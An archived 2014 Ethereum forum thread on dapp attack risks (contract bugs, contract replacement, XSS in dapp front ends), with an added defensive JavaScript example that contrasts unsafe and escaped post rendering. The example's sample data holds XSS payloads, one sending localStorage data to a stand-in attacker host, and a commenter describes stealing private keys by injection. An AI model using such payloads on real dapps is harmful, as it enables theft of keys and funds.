Are there any attack risks for Dapps?

YIETY South Korea, Daejon Member Posts: 1
edited August 2014 in Smart Contracts and Dapps
Of course, most developers involved in the Ethereum platform want the ecosystem to grow and go mainstream.

However, a mistake in contract code can cause an unintended attack on the platform.

How can we fix it once it is embedded in the Ethereum blockchain?

Comments

  • HellRazor Berlin Member Posts: 99 ✭✭
    As far as I can judge, errors in the contracts are less of an issue. If there are bugs that can somehow be exploited, they affect only the contract and not the network. But yeah, I also wonder if buffer overflows are possible so that one could change the contract storage? But, because the before-mentioned attack only affects the contract directly and the user only passively, in my opinion so far XSS seems to be a much bigger risk in DAPPs, as it can target the user directly. For example, if there is a forum software where the posts get loaded via swarm, I could easily inject javascript code into the ethereum browser and steal the private keys of the user or just send the ether directly to my address. I guess the app developer needs to implement correct parsing of external content in his Dapp, right? Or are there plans to prevent those kinds of issues?
  • StephanTual London, England Member, Moderator Posts: 1,282 mod
    YIETY said:

    However, a mistake in contract code can cause an unintended attack on the platform.

    Erm, no. A bug in a contract is just that: a bug in a contract, which will then not do what it was intended to do.
    YIETY said:

    How can we fix it once it is embedded in the Ethereum blockchain?

    If you have written a bug in your code, then you'd do the same as you'd do on any other programming platform: the solution is to fix the bug and republish a new contract, then suicide the old one.

    If you need to preserve a public address to your user base, then namereg is your friend, or you could proxy the contract address via another, updatable contract that just acts as a passthrough.


  • Jasper Eindhoven, the Netherlands Member Posts: 514 ✭✭✭
    Well, you can't just add a suicide button to any contract. :)

    DOUG is a system where you have a 'cluster' of contracts, and they call each other via names in the central DOUG contracts. So you can change parts by changing what contract a name refers to. Of course, you want some system to decide what conditions are needed to change something.

    Giving one Ethereum account total control can give you arbitrary conditions, btw, because that account can be a contract that uses some arbitrary condition to decide.
  • HellRazor Berlin Member Posts: 99 ✭✭
    @Stephan_Tual What about the javascript injection thing?
  • Jasper Eindhoven, the Netherlands Member Posts: 514 ✭✭✭
    We are aware that javascript should not just be able to send transactions itself like it can now.

    There is potentially a whole range of phishing-like attacks. Something still needs to be developed to combat it. I think, for instance, that contract writers might have a way to introduce a sort of 'second opinion' that is run (just on the client) before sending transactions to their contract. The second opinions can do different things like allow it to go through, show its own representation of what the transaction would do, which might even involve calling it a pointless transaction.
  • StephanTual London, England Member, Moderator Posts: 1,282 mod
    @HellRazor, yes, XSS attacks are a vector, just like they are on the web today. Don't link up to CDNs you don't trust, and don't package code that's not open-sourced and reviewed. The usual warnings that you find for web development today apply here, too :)
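    The forum scenario HellRazor raises and the two rules Stephan gives, as an added example (not code from this thread, from the Ethereum browser, or from any Ethereum project). It assumes posts arrive as plain strings from an untrusted store such as swarm and are turned into markup that the dapp assigns to innerHTML. The first renderer has the XSS hole; the second escapes the text so untrusted content can only ever be text; a small policy function implements "don't link up to CDNs you don't trust" as an allowlist of https script hosts. The post bodies, the host names and the base origin dapp.example are constructed for the example.

```javascript
// Added example, not code from the thread or from any Ethereum project.
// Scenario: a dapp forum whose posts are fetched from an untrusted store
// (swarm) and rendered in the Ethereum browser. All data below is constructed.

// Constructed sample posts; the last two carry payloads an attacker could publish.
const SAMPLE_POSTS = [
  { author: 'alice', body: 'Hello, world. 1 < 2 && 3 > 2' },
  { author: 'mallory', body: '<img src=x onerror="fetch(\'https://attacker.invalid/?k=\'+localStorage.key)">' },
  { author: 'mallory', body: '<script>sendEther("0xattacker")</script>' },
];

// Vulnerable rendering: the post body is concatenated straight into markup
// that the dapp would assign to innerHTML. The browser parses mallory's body
// as elements, so the onerror handler runs with the dapp's (and wallet's) privileges.
function renderPostUnsafe(post) {
  return '<div class="post"><b>' + post.author + '</b>: ' + post.body + '</div>';
}

// Hardened rendering: escape the five characters that can start a tag, end an
// attribute or introduce an entity, so untrusted text can only ever be text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderPostSafe(post) {
  return '<div class="post"><b>' + escapeHtml(post.author) + '</b>: ' + escapeHtml(post.body) + '</div>';
}

// A raw '<' followed by a tag name, '/' or '!' is what the HTML parser needs to
// start an element. The template itself emits exactly four such starts
// (<div>, <b>, </b>, </div>); anything beyond that came from the post data.
const TEMPLATE_TAG_STARTS = 4;

function countTagStarts(html) {
  return (html.match(/<[a-z!\/]/gi) || []).length;
}

function injectsMarkup(html) {
  return countTagStarts(html) > TEMPLATE_TAG_STARTS;
}

// Script-source policy for "don't link up to CDNs you don't trust": https only,
// and only hosts on an explicit allowlist. Protocol-relative ('//evil/x.js'),
// javascript: and http: sources are all rejected. The default base is a
// hypothetical dapp origin used to resolve relative paths like '/js/app.js'.
function isAllowedScriptSource(src, allowedHosts, base = 'https://dapp.example') {
  let url;
  try {
    url = new URL(src, base);
  } catch (e) {
    return false; // unparseable source: refuse rather than guess
  }
  return url.protocol === 'https:' && allowedHosts.includes(url.hostname);
}

// Run both renderers over the sample posts and report which outputs still
// contain markup that did not come from the template.
function auditRenderers(posts) {
  return posts.map((p) => ({
    author: p.author,
    unsafeInjects: injectsMarkup(renderPostUnsafe(p)),
    safeInjects: injectsMarkup(renderPostSafe(p)),
  }));
}

console.table(auditRenderers(SAMPLE_POSTS));
console.log('allow //cdn.evil.example/x.js:', isAllowedScriptSource('//cdn.evil.example/x.js', ['cdn.trusted.example']));
```

    In a browser the same escaping has to happen before any innerHTML assignment; assigning the untrusted string through textContent gives the same guarantee without hand-escaping. The host allowlist can also be enforced by the browser itself with a Content-Security-Policy script-src directive naming only those hosts, which blocks inline script and untrusted sources even if a renderer is missed.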
  • GeorgeHallam Member, Administrator, Moderator Posts: 229 admin
    It will certainly be a case of making sure any code that is used is completely trusted, reviewed and auditable.

    I believe there are plans within the community to link some of the reputation tracking dapps to a code repository which would be pretty neat :) can't for the life of me find the post now however!